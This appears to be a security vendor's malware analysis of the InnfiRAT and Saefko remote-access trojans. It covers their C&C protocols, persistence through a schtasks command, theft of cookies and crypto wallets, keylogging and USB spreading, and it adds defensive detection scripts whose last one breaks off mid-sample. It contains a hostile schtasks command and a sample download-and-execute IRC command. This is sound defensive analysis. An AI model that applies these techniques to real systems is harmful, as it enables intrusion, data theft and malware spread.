Inside the EjarVhXфf8752612307563884480() [FetchNetworkInfo] routine: a web request is sent to https://ipinfo[.]io/json and the received data is returned from the function. The received data contains the following fields: "ip", "city", "region", "country", "loc", "postal", "org".

Figure 7: Web request being made

Network communication

Inside the мMлFкCцеGPбiбqюK1559516831() [CreateDuplexChannel] routine: InnfiRAT sets up a duplex channel named "IVictim" using DuplexChannelFactory to tcp://62[.]210[.]142[.]219:17231/IVictim

Figure 8: Creating a duplex channel with the C&C server

After forming the duplex channel named IVictim, it uses the IVictim interface, which contains the following methods: "Subscribe", "CompleteTask", "GetDlls", "AvailableTasks".

Figure 9: Available methods in the IVictim interface

Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine: InnfiRAT calls the Subscribe method of the IVictim interface with login = "innfiniti".

Figure 10: The Subscribe method from the IVictim interface is invoked

Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine: InnfiRAT obtains the tasks in a UserTask list by invoking AvailableTasks, where UserTask has the following keys: "ID", "Action", "URL", "FinalPoint", "Current", "Status", "Country", "RunSilent", "Argument".

It iterates through each task. On each iteration, it first checks that the Country value received is equal to "ALL" OR to the one present in the BasicInfoVictim class obtained earlier, AND that the Action to perform is "DownAndEx" and a URL value is available. If these conditions match, the CompleteTasks method is called with three arguments: "login", "hwid", "TaskID".

The RAT then calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file:
Arg1 = Path of the file to be executed [obtained from the URL]
Arg2 = Arguments to the file to be executed [obtained from the Argument key of the current UserTask element]
Arg3 = true/false [obtained from the RunSilent key of the current UserTask element]

After iterating over all items in the UserTask list, it sleeps for 30,000 milliseconds.

Figure 11: Country, action, and URL checks are performed and the specified task is completed

Process checks

Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine: All the running processes in the system are obtained, their names are converted to lowercase, and a check is performed to see whether the name matches any of the following strings: "taskmgr", "processhacker", "procmon", "procexp", "pchunter", "procexp64". If there is a match, the process terminates. The snapshots below depict the actions performed.

Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes

Figure 13: Converting ProcessName to lowercase

Figure 14: Checking for the above-mentioned running processes (process names are obfuscated here)

Inside the wYxйыrоyTHuLдTч212065() [KillProcesses] routine: InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings: "chrome", "browser", "firefox", "opera", "amigo", "kometa", "torch", "orbitum".

Figure 15: Kills processes that contain any of the above-mentioned strings

Scheduled execution

Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine: A CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like this:

/C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm  /du 9999:59 /sc daily /ri 1 /f

Figure 16: CMD command is constructed and executed

C&C commands

Here are some tasks performed by the malware based on the commands received from the C&C server:

1. SendUrlAndExecute(string URL)

InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory named TEMP is first created inside %AppData% if it doesn't exist. The file is then downloaded and saved in this folder under the name extracted from the passed URL: the URL is split on the delimiter '/' and the last item is used as the file name.

Figure 17: Create folder and download file

Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file:
Arg1 = Path of the file to be executed
Arg2 = Arguments to the file to be executed
Arg3 = true

Figure 18: Execute the downloaded file

2. ProfileInfo()

Inside the routine, it collects the following information and sends it to the C&C server:
"NetworkInfo": { "ip", "city", "region", "country", "loc", "postal", "org" }
"PCAdmin"
"PCInformation": { "FrameWorkDescription", "Processors", "PRocessorsCore", "VideoCards" }

Figure 19: UserProfile info being collected and sent to the C&C server

3. LoadLogs()

It calls the GetDlls() routine, which obtains a list of type DownloadDll, where DownloadDll has two keys:
"Path"        represents a relative path to an .exe file
"ByteArray"   binary data

Figure 20: GetDlls being called

After fetching the list, InnfiRAT traverses each element of the list in a for-loop. Inside the loop: the value of the Path key is split on the delimiter "\\"; the second value of the split is the name of a directory. A check is performed to see whether the count after the split is greater than 2 and there is no directory with that name inside the executing module's directory; if so, a directory with that name is created. A further check is performed to see whether no file exists at the path given by the Path key inside the executing module's directory; if so, it creates the file and writes the value of ByteArray to it. The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is then called. Finally, the data obtained from UserProfile() is sent to the C&C server.

Figure 21: A directory is created, a file is created, and KillProcesses is called; the response is sent to the C&C server

4. LoadCookies() - Steal browser cookie information

InnfiRAT calls the GetDlls() routine, which obtains a list of type DownloadDll with the same two keys ("Path", a relative path to an .exe file, and "ByteArray", binary data).

Figure 22: GetDlls being called

After fetching the list, the malware traverses each element in a for-loop and performs the same directory and file creation as in LoadLogs(): the Path value is split on "\\", the second value is the directory name, the directory is created if the split count is greater than 2 and no directory of that name exists inside the executing module's directory, and the file is created and filled with the ByteArray value if it does not yet exist.

Figure 23: Directory is created, file is created

It then creates an empty list of type BrowserCook, where BrowserCook has two keys: "CookiePaths", "BrowserName". The name and corresponding cookie path are retrieved one by one for the following browsers: "Chrome", "Yandex", "Kometa", "Amigo", "Torch", "Orbitum", "Opera", "Mozilla". A BrowserCook element is created with the fetched information and added to the list.

Figure 24: Browser info is retrieved and added to the list

It creates an empty list of type BrowserCookie, where BrowserCookie has three keys: "Browser", "FileName", "FileArray". Inside two for-loops, elements of type BrowserCookie are created: the Browser and FileArray keys are assigned values from the previously created BrowserCook list, and FileName is set to _Cookie.txt if the browser name of the current element is not "Mozilla", or to Cookie.txt otherwise.

Figure 25: BrowserCookie elements list is built

The harvested BrowserCookie list is then sent to the C&C server, and the temporary file and directory are deleted.

Figure 26: File and directory are deleted

5. LoadWallets() - Steal Bitcoin wallets

The malware creates an empty list of type BitcoinWallet, where BitcoinWallet has two keys: "WalletArray", "WalletName". It checks whether a Litecoin or Bitcoin wallet file is present on the system at the following locations:
Litecoin: %AppData%\Litecoin\wallet.dat
Bitcoin: %AppData%\Bitcoin\wallet.dat
If found, an element of type BitcoinWallet is added to the list, with a name assigned to the WalletName key and the contents of the wallet file read into the WalletArray key.

Figure 27: File presence is checked, BitcoinWallet element is added to the list

Finally, the created list is sent in response to the C&C server.

Figure 28: List is sent in response to the C&C server

6. LoadFiles() - Steal small text files potentially containing sensitive information

InnfiRAT collects all the .txt files on the desktop whose size is less than 2,097,152 bytes into a list of type CustomFile, where CustomFile has two keys: "Name", "FileArray". The created list is sent in response to the C&C server.

Figure 29: Files are collected and sent to the C&C server

Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]

7. LoadProcesses() - Get the list of running processes on the victim machine

InnfiRAT creates an empty list of type ProcessInfo, where ProcessInfo has three keys: "ID", "Name", "Path". It obtains the list of all processes running in the system and sends the list in response to the C&C server.

Figure 31: Process information is obtained and the list is sent to the C&C server

8. Kill(int process) - Kill a specific process on the victim machine

InnfiRAT obtains the list of all processes running in the system and then, in a for-loop, compares the process ID of each obtained process with the process ID passed as an argument to this routine. If there is a match, the process is killed and a flag variable is set to true. Finally, a response is sent to the C&C server.

Figure 32: Process is killed and response is sent

9. Screenshot() - Take a screenshot on the victim machine

It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.

Figure 33: Screenshot captured and sent to the C&C server

Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine

10. RunCommand(string command) - Execute the specified command on the victim machine

This creates a new CMD process, builds the command line argument from the command passed to this routine, and starts the process. Command line argument: /c + " " + command

Figure 35: Received command is executed

11. ClearCooks() - Clear browser cookies on the victim machine for specific browsers

InnfiRAT creates an empty list of type BrowserCook (keys "CookiePaths", "BrowserName") and retrieves the name and corresponding cookie path, one by one, for the following browsers: "Chrome", "Yandex", "Kometa", "Amigo", "Torch", "Orbitum", "Opera", "Mozilla". A BrowserCook element is created with the fetched information and added to the list.

Figure 36: Browser info is retrieved and added to the list

The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. The BrowserCook list created earlier is traversed and the cookie files are deleted using the CookiePaths key value. Finally, a response is sent to the C&C server.

Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and a response is sent to the C&C server

Conclusion

A RAT (remote-access trojan) is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. RATs can also be designed to spread to other systems on a network. Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an infected application, the first line of defense is often the users, who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source. The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.

IOCs

Md5: f992dd6dbe1e065dff73a20e3d7b1eef
Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip
NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
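The scheduled-task command shown in the "Scheduled execution" section above is one of the more durable host-side detection opportunities in this RAT: a task whose image lives under %AppData%, repeats every minute (/ri 1) and runs for 9999 hours (/du 9999:59) is unusual for legitimate software regardless of the task name. The parser below is an added example, not code from the Zscaler post: it tokenises a process-creation command line, extracts the schtasks switches, and scores the invocation against the names reported in the post and the repetition pattern. The process-creation records are constructed for the demo, and the thresholds (interval of 5 minutes or less, duration of 24 hours or more) are assumptions.

```python
"""Flag schtasks persistence matching the InnfiRAT pattern (added example, not from the post).

Assumptions: process-creation events are dicts with a 'cmdline' field
(constructed here); thresholds for "beacon-like" repetition are arbitrary.
"""
import re

KNOWN_TASK_NAMES = {"windowsupdater"}       # task name shown in the post
KNOWN_IMAGE_NAMES = {"nvidiadriver.exe"}    # dropped file name shown in the post
APPDATA_RE = re.compile(r"%appdata%|\\appdata\\(roaming|local)\\", re.I)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> list:
    """Split on whitespace but keep double-quoted arguments intact (quotes removed)."""
    return [quoted if quoted else bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse_opts(tokens: list) -> dict:
    """Map each /switch to the value that follows it; valueless switches map to True."""
    opts, i = {}, 0
    while i < len(tokens):
        key = tokens[i].lower()
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
        if key.startswith("/") and has_value:
            opts[key] = tokens[i + 1]
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts


def assess(cmdline: str) -> dict:
    """Return the schtasks /create details plus the reasons the command looks suspicious."""
    tokens = tokenize(cmdline)
    start = next((i for i, t in enumerate(tokens)
                  if t.lower().rsplit("\\", 1)[-1] in ("schtasks", "schtasks.exe")), None)
    if start is None:
        return {"schtasks_create": False, "reasons": []}
    opts = parse_opts(tokens[start + 1:])
    if "/create" not in opts:
        return {"schtasks_create": False, "reasons": []}
    task = str(opts.get("/tn", "")).strip().lower()
    image = str(opts.get("/tr", "")).strip().lower()
    reasons = []
    if APPDATA_RE.search(image):
        reasons.append("task image lives under %AppData%")
    if any(name in image for name in KNOWN_IMAGE_NAMES):
        reasons.append("image name matches InnfiRAT dropper (NvidiaDriver.exe)")
    if task in KNOWN_TASK_NAMES:
        reasons.append("task name matches InnfiRAT (WindowsUpdater)")
    ri = str(opts.get("/ri", ""))
    du_hours = str(opts.get("/du", "0:0")).split(":")[0]
    if ri.isdigit() and int(ri) <= 5 and du_hours.isdigit() and int(du_hours) >= 24:
        reasons.append("re-runs every %s min for %s hours (beacon-like repetition)" % (ri, du_hours))
    return {"schtasks_create": True, "task": task, "image": image, "reasons": reasons}


def hunt(events: list) -> list:
    """Return every event whose command line produced at least one reason."""
    flagged = []
    for ev in events:
        result = assess(ev["cmdline"])
        if result["reasons"]:
            flagged.append({**ev, **result})
    return flagged


# Constructed process-creation records (not real telemetry). The first mirrors the post's command.
SAMPLE_EVENTS = [
    {"ts": "2019-09-10T08:12:03Z", "user": r"DESKTOP-1\alice",
     "cmdline": 'cmd.exe /C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " '
                '/st 08:12 /du 9999:59 /sc daily /ri 1 /f'},
    {"ts": "2019-09-10T09:00:00Z", "user": r"DESKTOP-1\admin",
     "cmdline": r'schtasks.exe /create /tn "Nightly Backup" /tr "C:\Program Files\Backup\bk.exe" /sc daily /st 02:00'},
    {"ts": "2019-09-10T09:05:00Z", "user": r"DESKTOP-1\alice", "cmdline": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["ts"], hit["user"], hit["reasons"])
```

The name-based reasons will stop firing as soon as the operator renames the task or the dropped file; the %AppData% image and the minute-level repetition are the parts of the rule worth keeping in a production detection, since they describe the behaviour rather than this sample.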

Saefko: A new multi-layered RAT

Zscaler Research - 1 hour 14 mins ago
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.   Background A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the chrome browser history looking for specific types of activities, such as those involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests for further instructions. The C&C instructs the malware to provide system information and the RAT will begin to collect a range of data including screenshot,videos, keystroke logs and more. The C&C can also instruct the malware to download additional payload onto the infected system. RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.   
Technical Analysis of the Saefko RAT Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them. Autostart Key The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key: “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Otherwise, it creates a registry key in the following path: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Functionality Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems. 
The categories and the sites it searches for are:

Credit card possibility: paypal.com, 2c2p, adyen.com, volusion.com, pay.amazon.com, apple.com/apple-pay/, atos.net, authorize.net, BIPS, bitpay.com, bpay.com, braintreepayments.com, centup.org, cm.com, creditcall.com, cybersource.com, mastercard.com, digi.cash, digitalriver.com, dwolla.com, elavon.com, euronetworldwide.com, eway.io, firstdata.com, fortumo.com, pay.google.com/send/home, heartlandpaymentsystems.com, ingenico.com, ippayments.com, klarna.com, emergentpayments.ne, moduslink.com, mpay.com, neteller.com, ofx.com, pagseguro, payoneer.com, paymentwall.com, paypoint.co, paysbuy.com, paysafe.com, paytm.com, payzone.co.uk, crunchbase.com, qiwi.com, globalpaymentsinc.com, reddotpayment.com, sagellc.com, skrill.com, stripe.com, squareup.com, tencent.com, transfermate.com, transferwise.com, wmtransfer.com, trustly.com, wepay.com, verifone.com, xendpay.com, pay.weixin.qq.com, money.yandex.ru, wirecard.com, truemoney.com, xsolla.com, myshopify.com/admin, payza.com, 2checkout.com, 3dcart.com, paysafecard.com, weebly.com

Gaming activity value: origin.com, steampowered.com, g2a.com, twitch.tv, nichegamer.com, techraptor.net, gematsu.com, estructoid.com, pcgamer.com, gamefaqs.gamespot.com, gamespot.com, siliconera.com, rockpapershotgun.com, gameinformer.com, decluttr.com, glyde.com, gamestop.com, microsoft.com/account/xboxlive, playstation.com/en-us/network/store, nintendo.com/games, gog.com, game.co.uk, itch.io, gamefly.com, greenmangaming.com, gaming.youtube.com

Cryptocurrency value: etoro.com, 24option.com, puatrack.com/coinbull2/, luno.com, paxforex.com, binance.com, coinbase.com, cex.io, changelly.com, coinmama.com, xtrade.ae, capital.com, paxful.com, kraken.com, poloniex.com, gemini.com, bithumb.com, xcoins.io, cobinhood.com, coincheck.com, coinexchange.io, shapeshift.io, bitso.com, indacoin.com, cityindex.co.uk, bitbay.net, bitstamp.net, cryptopia.co.nz, pro.coinbase.com, kucoin.com, bitpanda.com, foxbit.com.br, bitflyer.com, bitfinex.com, bit-z.com, quadrigacx.com, big.one, lakebtc.com, wex.nz, kuna.io, yobit.io, zebpay.com, hitbtc.com, bx.in.th, trezor.io, electrum.org, blockchain.com, crypto.robinhood.com, exodus.io, mycelium.com, bitcointalk.org, btc-e.com, moonbit.co.in, bitcoinaliens.com, bitcoinwisdom.com, coindesk.com, cointelegraph.com, ccn.com, reddit.com/r/Bitcoin/, bitcoin.org/en/blog, newsbtc.com, blog.spectrocoin.com, blog.coinbase.com, bitcoinist.com, forklog.com, abitcoinc.com, bitcoin.stackexchange.com, news.bitcoin.com, blog.bitfinex.com, blog.genesis-mining.com

Instagram activity: instagram.com, m.instagram.com

Facebook activity: facebook.com, m.facebook.com

YouTube activity: youtube.com, m.youtube.com

Google+ activity: plus.google.com, m.plus.google.com

Gmail activity: gmail.com, mail.google.com

Shopping activity: boohoo.com, gymshark.com, mail.google.com, prettylittlething.com, showpo.com, athleta.com, ae.com, ruelala.com, asos.com, superdry.com, zaful.com, zafulswimwear.com, luckybrand.com, forever21.com, urbanoutfitters.com, nastygal.com, jcrew.com, anthropologie.com, allsaints.com, uniqlo.com, armaniexchange.com, fashionnova.com, saksoff5th.com, target.com, macys.com, barneys.com, zappos.com, sneakersnstuff.com, yoox.com, nike.com, simmi.com, amazon.com, ebay.com, walmart.com, newegg.com, bestbuy.com, ftd.com, 1800flowers.com, glossier.com, sephora.com, thebodyshop.com, ulta.com, horchow.com, homedepot.com, pier1.com, bedbathandbeyond.com, wayfair.com, shoptiques.com, viator.com, etsy.com, cloud9living.com, seatgeek.com, aliexpress.com, alibaba.com

Business value: linkedin.com, twitter.com, nasdaq.com, ft.com, reuters.com, nyse.com, tsx.com, marketwatch.com, thestreet.com, wsj.com, investing.com, investopedia.com, finance.yahoo.com, seekingalpha.com, fool.com, investorguide.com, zacks.com, home.saxo, forexbrokers.com, swissquote.com, cmcmarkets.com, fxpro.co.uk, forex.com, dukascopy.com, interactivebrokers.com, tdameritrade.com, bankofinternet.com, ally.com, bankpurely.com, redneck.bank

Saefko also collects additional system and application data. The field names below are the malware's own (misspellings included); the description is what each field holds:

irc_channel: IRC channel name
irc_nickname: IRC nickname
irc_password: IRC channel password
irc_port: IRC port used to reach the server
irc_server: IRC server name
machine_active_time: system uptime
machine_artct: machine architecture
machine_bitcoin_value: number of cryptocurrency sites visited by the user
machine_business_value: number of business sites visited by the user
machine_calls_activity: always 0
machine_camera_activity: number of ".png" files present on the desktop
machine_country_iso_code: country code fetched from ipinfo.io/geo
machine_lat: latitude of the system (from the same geolocation lookup)
machine_lng: longitude of the system
machine_creadit_card_posiblty: number of payment sites visited by the user
machine_current_time: current machine time
machine_facebook_activity: number of Facebook visits
machine_gaming_value: number of gaming-site visits
machine_gmail_avtivity: number of Gmail visits
machine_googleplus_activity: number of Google+ visits
machine_instgram_activty: number of Instagram visits
machine_ip: machine IP address
machine_os_type: always 1
machine_screenshot: screenshot of the desktop, Base64-encoded
machine_shooping_activity: number of shopping-site visits

The RAT sends the collected data to the command-and-control server as shown below. After receiving an "ok" response from the server, Saefko calls its "StartServices" function, which starts four modules:

HTTPClinet
IRCHelper
KEYLogger
StartLocalServices (USB spreading)

HTTP Clinet (the author's misspelling of HTTP Client)

The RAT asks the server for a new task by sending the command "UpdateAndGetTask" together with other information, including machine_ID, machine_os and privateip, as shown below. The task is a URL from which the malware downloads a new payload, which it then executes on the infected machine.
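The history-based scoring described above (count visits per category, then rank victims by the counts) can be reproduced offline against a Chromium-style History database, which is an SQLite file with a `urls` table holding `url` and `visit_count` columns. The block below is an added example written for this page; it is not Saefko's code and does not reproduce its full site lists. It uses a small subset of the categories from the lists above, treats an entry that carries a path (such as pay.google.com/send/home) as a host-plus-path-prefix match, and builds a constructed in-memory history instead of reading a real profile. On a live system the History file is locked while the browser runs, so an analyst would copy it first.

```python
import sqlite3
from collections import Counter
from urllib.parse import urlparse

# Category -> patterns (host, or host/path-prefix). Subset of the lists on this
# page, chosen for illustration; the real list is much longer.
CATEGORIES = {
    "credit_card_possibility": ["paypal.com", "stripe.com", "pay.google.com/send/home", "myshopify.com/admin"],
    "cryptocurrency_value": ["coinbase.com", "binance.com", "blockchain.com"],
    "gaming_value": ["steampowered.com", "twitch.tv"],
    "shopping_activity": ["amazon.com", "ebay.com", "macys.com"],
    "business_value": ["linkedin.com", "nasdaq.com"],
    "gmail_activity": ["mail.google.com", "gmail.com"],
}


def _split(pattern):
    """'pay.google.com/send/home' -> ('pay.google.com', '/send/home'); bare hosts get an empty path."""
    host, _, path = pattern.partition("/")
    return host, ("/" + path if path else "")


def classify(url):
    """Return every category a single visited URL counts towards."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    hits = []
    for cat, patterns in CATEGORIES.items():
        for pattern in patterns:
            phost, ppath = _split(pattern)
            # exact host or any subdomain, and the path prefix when the pattern has one
            if (host == phost or host.endswith("." + phost)) and parsed.path.startswith(ppath):
                hits.append(cat)
                break
    return hits


def score_history(conn):
    """Count category hits over a Chromium-style 'urls' table.
    Each row contributes its visit_count, so frequently visited sites weigh more."""
    counts = Counter({cat: 0 for cat in CATEGORIES})
    for url, visit_count in conn.execute("SELECT url, visit_count FROM urls"):
        for cat in classify(url):
            counts[cat] += visit_count
    return dict(counts)


def build_sample_history():
    """Constructed in-memory stand-in for Chrome's History database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE urls (id INTEGER PRIMARY KEY, url TEXT, title TEXT, visit_count INTEGER)")
    rows = [
        ("https://www.paypal.com/myaccount/summary", "PayPal", 5),
        ("https://pay.google.com/send/home", "Google Pay", 2),
        ("https://pay.google.com/about", "Google Pay", 9),      # wrong path prefix, must not count
        ("https://store.steampowered.com/", "Steam", 3),
        ("https://www.amazon.com/gp/cart", "Amazon", 4),
        ("https://mail.google.com/mail/u/0/", "Gmail", 20),
        ("https://example.com/paypal.com", "decoy", 7),         # host is example.com, must not count
    ]
    conn.executemany("INSERT INTO urls (url, title, visit_count) VALUES (?, ?, ?)", rows)
    return conn


if __name__ == "__main__":
    print(score_history(build_sample_history()))
```

Matching on the parsed hostname rather than on a substring of the whole URL is what keeps the decoy row from counting; a naive `"paypal.com" in url` check, which is the cheap way to write this, would score it.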
Key Logger

The malware uses the SetWindowsHookEx API to capture keystrokes and stores them in a "log.txt" file at %AppData%\Local\log.txt.

IRC Helper

The malware first disconnects any existing IRC connection, then reports its status to the C&C as shown below:

pass: password
command: UpdateHTTPIRCStatus
machine_id: unique ID sent by the C&C in an earlier request
irc_status: 1

Next the malware selects its connection parameters: Serverlist (it picks a server from the list below), Port (the matching port) and Nickname (a random 7-character name).

List of IRC servers and ports:

irc.afterx.net 6667
irc.cyanide-x.net 6667
chat.freenode.net 6667
irc.europnet.org 6667
irc.azzurra.org 6669
irc.rizon.net 6669
irc.dal.net 6667
irc.efnet.org 6667
irc.gamesurge.net 6667
open.ircnet.net 6669
irc.quakenet.org 6667
irc.swiftirc.net 6667
eu.undernet.org 6667
irc.webchat.org 7000
irc.2600.net 6667
irc.abjects.net 6669
irc.accessirc.net 6667
irc.afternet.org 6667
irc.data.lt 6667
irc.allnetwork.org 6667
irc.alphachat.net 6667
irc.austnet.org 6667
irc.axenet.org 6667
irc.ayochat.or.id 6667
irc.beyondirc.net 6669
irc.blitzed.org 6667
irc.bongster.org 6669
irc.caelestia.net 6667
irc.canternet.org 6667
irc.chatall.org 6669
irc.chatcafe.net 6667
irc.chatspike.net 6667
irc.chatzona.org 6667
irc.criten.net 6667
irc.cyberarmy.net 6667
irc.d-t-net.de 6667
irc.darkmyst.org 6667
irc.deepspace.org 6667
irc.dream-irc.de 6667
irc.drlnet.com 6667
irc.dynastynet.net 6667
irc.echo.com 6667
irc.ecnet.org 6667
irc.enterthegame.com 6667
irc.epiknet.org 6667
irc.esper.net 6667
irc.euirc.net 6669
irc.evolu.net 6667
irc.explosionirc.net 6667
irc.fdfnet.net 6668
irc.fef.net 6667

Note that these are public IRC networks, not attacker infrastructure, so blocking them wholesale or treating a connection to one of them as proof of infection is not appropriate; the commands exchanged are the indicator.

Saefko connects to one of these servers and waits for a response. It looks for the string "T_T" in what it receives and uses that string as the separator between individual messages. Below is the list of IRC commands the RAT supports.
Saefko responds to each command it receives with the corresponding data.

List of IRC commands:

dexe: download a file from a given URL and execute it
hdexe: download a file from a given URL and execute it with UseShellExecute=false
vistpage: open a URL
hvistpage: open a URL with UseShellExecute=false
snapshot: capture a video frame, Base64-encode it and send it to the C&C (details below); also replies ".oksnapshot"
shell: execute a command using cmd.exe
tcp: open a TCP connection to a given IP and port
identify: send system information: OS type (Microsoft Windows), OS version, username, machine name, system directory
opencd: open the CD-ROM drive (command: set CDAudio door open)
closecd: close the CD-ROM drive (command: set CDAudio door closed)
screenshot: capture a screenshot, Base64-encode it and send it to the C&C
ping: reply "okping"
camlist: enumerate the video devices on the system and send the information to the C&C (details below)
pwd: report the current directory
location: look up the system location via https://ipinfo.io/geo (IP, city, region, country, latitude and longitude)
keylogs: Base64-encode the keylog file (log.txt) and send it to the C&C
uninstall: delete the autostart registry key (Run) and terminate

Camlist

Saefko checks whether the following libraries are present on the system:

AForge.dll
AForge.Video.DirectShow.dll
AForge.Video.dll
Sqlite3.dll

If they are missing, the malware asks the C&C to download them. It then enumerates the video input devices on the system and sends their details to the C&C.

Snapshot

Saefko captures video from a camera attached to the system, Base64-encodes the frame and sends it to the C&C.

Start USB Service

Saefko checks whether a drive is removable or a network drive and, if so, starts the infection by copying the following files onto it:

Sas.exe
USBStart.exe
usbspread.vbs

Sas.exe is a copy of the malware itself. USBStart.exe is extracted from the resource section of the main binary and contains the code that runs Sas.exe. The malware writes usbspread.vbs and executes it: the script walks every directory and file on the drive, creates a .lnk file for each of them with USBStart.exe as the target, and hides the real files and folders. When the drive is plugged into another system the user sees only the shortcuts and is tricked into clicking one; the .lnk launches USBStart.exe, which in turn runs Sas.exe, the main payload, and so the infection spreads to further systems. Below is the code of usbspread.vbs:

One online forum carries an advertisement for a cracked copy of the Saefko RAT, shown below. It is sold as a multi-protocol, multi-operating-system remote administration tool that can launch the malware on Windows and Android devices.

Conclusion

To protect systems from RATs, users should avoid downloading programs or opening attachments from untrusted sources. At the administrative level, block unused ports, turn off unused services and monitor outgoing traffic. Attackers are often careful to keep the malware from doing too much at once, since that would slow the system and draw the attention of the user and IT. The Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.
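The IRC command channel described above (PRIVMSG text split on "T_T", each fragment starting with one of the listed commands) is a better detection hook than the server list, because the servers are public networks. The block below is an added example, not part of the original analysis: a small parser for raw IRC lines that applies that split and alerts only when a fragment begins with a known Saefko command. The sample lines are constructed, the nickname is a stand-in for the random 7-character nick, and the assumption that every "T_T"-separated fragment starts with a command word is mine; the post only says the string separates messages.

```python
import re

# Command names taken from the IRC command table in the analysis above.
SAEFKO_COMMANDS = {
    "dexe", "hdexe", "vistpage", "hvistpage", "snapshot", "shell", "tcp",
    "identify", "opencd", "closecd", "screenshot", "ping", "camlist", "pwd",
    "location", "keylogs", "uninstall",
}
DELIMITER = "T_T"

# ":prefix COMMAND target :trailing" as used by PRIVMSG; numerics and PING do not match.
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Z]+) (?P<target>\S+) :(?P<text>.*)$")


def parse_privmsg(line):
    """Return (prefix, target, text) for a PRIVMSG line, else None."""
    m = IRC_LINE.match(line.strip())
    if not m or m.group("cmd") != "PRIVMSG":
        return None
    return m.group("prefix"), m.group("target"), m.group("text")


def extract_saefko_commands(text):
    """Split the message body on the RAT's delimiter and return (command, args)
    for every fragment whose first word is a known Saefko command."""
    found = []
    for fragment in text.split(DELIMITER):
        parts = fragment.strip().split(None, 1)
        if parts and parts[0].lower() in SAEFKO_COMMANDS:
            found.append((parts[0].lower(), parts[1] if len(parts) > 1 else ""))
    return found


def scan_irc_log(lines):
    """Alert on lines that carry the delimiter AND at least one known command.
    Requiring both keeps ordinary chat that happens to contain 'T_T' quiet."""
    alerts = []
    for line in lines:
        parsed = parse_privmsg(line)
        if parsed is None:
            continue
        prefix, target, text = parsed
        if DELIMITER not in text:
            continue
        cmds = extract_saefko_commands(text)
        if cmds:
            alerts.append({"from": prefix, "to": target, "commands": cmds})
    return alerts


# Constructed sample traffic, not a real capture. 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    ":irc.example.net 001 abcdefg :Welcome",
    ":op!op@10.0.0.5 PRIVMSG abcdefg :dexe http://198.51.100.7/dwd/x.exeT_Tping",
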